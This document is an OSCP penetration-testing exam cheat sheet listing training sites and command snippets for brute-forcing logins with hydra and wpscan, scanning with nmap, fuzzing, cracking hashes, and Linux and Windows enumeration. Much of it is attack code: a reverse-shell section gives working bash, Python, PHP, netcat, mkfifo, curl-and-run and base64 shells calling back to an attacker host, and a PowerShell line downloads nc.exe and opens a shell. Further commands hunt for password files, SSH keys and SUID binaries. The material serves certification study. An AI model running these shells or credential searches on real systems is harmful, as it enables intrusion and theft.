Useful Websites

offical exam guide
offical exam report
pentest.ws: note taking
Burp Suite: tool for exploring web security. Configure browser with Burp Suite
OWASP juice box: OWASP security trainings
[hack this site]
[over the wire]
[pwnable.kr/xyz]
[hack the box]
[cybrary]
[google gruyeye]
[game of hacks]
[bWAPP]
[Webgoat]
hashcat: password recovery tool
feroxbuster: powerful forced browsing tool (gobuster、dirb)
AutoRecon: multi-threaded network reconnaissance tool which performs automated enumeration of services
explainshell: explain command-line
SecLists: It's a collection of multiple types of lists used during security assessments, collected in one place
Reverse Shell Generator: online reverse shell generator
hacktricks
CyberChef: a web app for encryption, encoding, compression and data analysis. Microsoft Security Response Center

⚠️ Exam Restrictions

linPEAS: Understanding the tools/scripts you use in a Pentest
Official Exam Guide
2022 Official OSCP Prep Guide

⚠️ Exam Change

2022/1/11 Active Directory
2022/8/6 OSCP Bonus Points Update
2023/3/15 PEN-200 (PWK): Updated for 2023

• FAQ
• The OSCP exam is not changing as part of the update, with the exception of the removal of the independent Buffer Overflow machine from the exam. After the new material has been available for six months, any content included in the new version of PWK will be eligible for inclusion on the exam.

🛠️ Commands

📂 hydra

Make sure there are no maximum number of login attempts. To perform a manual check.

IMAP

hydra -L <usernameList> -P <passwordList> -s 143 -f <target ip> imap
# -f exit when a login/pass pair is found
# -s target port

PostgreSQL

hydra -l <username> -P <passwordList> <target ip> postgres

for normal connection

psql -U <username> -p 5432 -h <hostname or ip>

HTTP Basic Authentication

hydra -l admin -P <passwordList> -s 80 -f <target ip> http-get /
# (/):default 

JSON

# Content-Type、Accept、Origin、X-Requested-With、Referer and CSRF checks、Cookies
# use cURL to check necessary headers
hydra -l admin -P <passwordList> <target ip> https-post-form "/login:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=401:H=Origin\: https\://test.com:H=Accept\: application/json, text/plain, */*:H=Content-Type\: application/json;charset=utf-8"

📂 cewl

get a list for password crackers

cewl -d 4 https://192.168.0.1 -w /tmp/wordlists.txt --with-numbers --lowercase
# -d depth
# --with-numbers: Accept words with numbers in as well as just letters
# --help

📂 nmap

Timing Templates

Host Discovery

scan a subnet

# Note that if set too fast may affect the results
nmap -T3 192.168.10.0/24

scan all TCP ports and services

nmap -Pn -p- -sC -sV -T4 <target ip>

optimizing performance

nmap -p- --min-rate 1000 <target ip>
# --min-rate <number>: Send packets no slower than <number> per second

# and then specific port
nmap -p <target port> -sC -sV <target ip>

# UDP
nmap -p- --min-rate 1000 -sU <target ip>

📂 reverse shell

ncat

ncat -e /bin/bash <attacker ip> <attacker port>

python3(file)

#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker ip>",<attacker port>)) 
dup2(s.fileno(),0) 
dup2(s.fileno(),1) 
dup2(s.fileno(),2) 
run(["/bin/bash","-i"])

python(file)

#!/usr/bin/env python
import os
import sys
try: 
        os.system("python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker ip>\",<attacker port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")\'") 
except: 
        print 'ERROR...' 
sys.exit(0) 

When using the exploit file to pass command parameters fails

python

command = "echo '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh"

java

String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" }; 
Runtime.getRuntime().exec(cmdline);

php(file)

<?php system(\"nc -e /bin/bash <attacker ip> <attacker port>\"); ?>

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'");?>

special cases 1

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f

special cases 2

# rev.sh
# sh -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1
curl http://<attacker ip>/rev.sh -o /tmp/rev.sh
bash /tmp/rev.sh

base64

echo 'bash -c "bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1"' | base64
echo -n <base64 command string> | base64 -d | bash 
# echo -n cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsODApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw== | base64 -d | bash      

Windows cmd

REM https://www.revshells.com/ Powershell#3(Base64)
PowerShell.exe -command "powershell -e <base64 command string>"

📂 Cron jobs

crontab -l

ls -alh /etc/cron.* /etc/at*

cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

unprivileged Linux process snooping: pspy

📂 WordPress

WPScan

Finding application

wpscan --url http://192.168.0.1/

Enumerating valid usernames

wpscan --url http://192.168.0.1/ --enumerate u1-1000

Enumerating themes

wpscan --url http://192.168.0.1/ -e at

curl -k -s http://192.168.0.1/wp-content/themes/ | html2text

curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Enumerating plugins

wpscan --url http://192.168.0.1/ -e ap

wpscan --url http://192.168.0.1/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose
# --api-token:display vulnerability data (not always necessary), register a uesr and get the api key from wpscan offical website

curl -k -s http://192.168.0.1/wp-content/plugins/ | html2text

curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Brute-force attack

wpscan --url http://192.168.0.1/ --passwords /usr/share/wordlists/rockyou.txt --max-threads 50 --usernames admin

SSL peer certificate or SSH remote key was not OK

wpscan --url https://192.168.0.1/ --disable-tls-checks

📂 LFI

LFI Suite

file in Windows

C:\Windows\System32\drivers\etc\hosts

📂 AutoRecon

git clone https://github.com/Tib3rius/AutoRecon.git

cd AutoRecon

sudo python3 autorecon.py <target IP> --dirbuster.wordlist "" # skip directory busting to speed up results

📂 Wfuzz

find subdomains

wfuzz -H 'Host: FUZZ.test.com' -u http://test.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 407
# hw:hide responses words

need to authenticate

# php example
wfuzz -H 'Cookie: PHPSESSID=<fill in the PHPSESSID>' -u https://<target ip>/<folder>/?FUZZ= -w <wordlist> --hw <value>

post requests

wfuzz -z file,<wordlist> -d "username=admin&password=FUZZ" --hc 302 <url>
# -d postdata
# -z file,wordlist
# hc:hide responses code

📂 hashcat

create new password list

echo -n "passwordstring" > /tmp/oldPass
# -n: do not output the trailing newline

hashcat -r /usr/share/hashcat/rules/best64.rule --stdout /tmp/oldPass > /tmp/newPassList.txt

MD5

REM Try using m=0
 .\hashcat.exe -a 0 -m 0 .\hash .\rockyou.txt

🖥️ Linux

Typical site folders

/srv/http/
/var/www/html/

avoid permission denied messages

find / -name *kali* 2>&-

Writable file

find / -writable -type f 2>/dev/null | grep -v "/proc/"

find files containing specific text

find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-

finding SUID executables

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

find ssh key

find / -type f -name id_rsa* 2>&-

what the group can do

id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),122(bluetooth),134(scanner),143(kaboxer)
find / -group <name> 2>/dev/null
# find / -group wireshark 2>/dev/null

upgrade reverse shell in Kali

# 1.switch to bash
bash
nc -nlvp <local port>
# 2
/usr/bin/script -qc /bin/bash /dev/null
# 3
script -c "/bin/bash -i" /dev/null

# chsh - change your login shell
chsh /bin/bash
# full pathnames of valid login shells
cat /etc/shells
# 1.finding current shell
echo $0
# 2.finding current shell 
/proc/self/exe --version

🖥️ Windows

icacls: Performs the operation on all specified files in the current directory and its subdirectories.

icacls <directory> /t

Remarks

A sequence of simple rights:

F - Full access

M - Modify access

RX - Read and execute access

R - Read-only access

W - Write-only access

download file

certutil -f -urlcache <URL> <local filename>
powershell -Command "Invoke-WebRequest '<URL>' -OutFile <filename>"
powershell -Command "Invoke-WebRequest \"<URL>\" -OutFile <filename>"

get file hash

certutil -hashfile <file> MD5

find files containing specific text

findstr /si password C:\*.xml C:\*.ini C:\*.txt C:\*.config C:\*.conf

📂 PowerShell

bypass

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\Windows\Temp\xxx.ps1

zip

Compress-Archive -Path C:\Users\guest\Desktop\dist -DestinationPath C:\Users\guest\Desktop\dist

unzip

Expand-Archive -LiteralPath C:\Users\guest\Desktop\dist.zip -DestinationPath C:\Users\guest\Desktop

reverse shell

powershell -c "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.100/nc.exe', 'C:\users\XXX\desktop\nc.exe');C:\users\XXX\desktop\nc.exe 192.168.0.100 80 -e cmd"

find specific files

Get-ChildItem -Path "C:\Folder" -Recurse -Force -Filter "*.txt"
Get-ChildItem -Path "C:\Folder" -Recurse -Force -Include "*.txt","*.zip","*.conf"

📂 Firefox

disable search in address bar function, easier to test

type in searchBar "about:config"
Accept warning
Search "keyword.enabled" and change it to false

modify header tool (or Burp Suite)

https://addons.mozilla.org/en-US/firefox/addon/simple-modify-header/

📂 others

C:\Windows\SysWOW64
C:\Windows\System32
C:\Windows\System32\drivers\etc\hosts

📂 IIS-ShortName-Scanner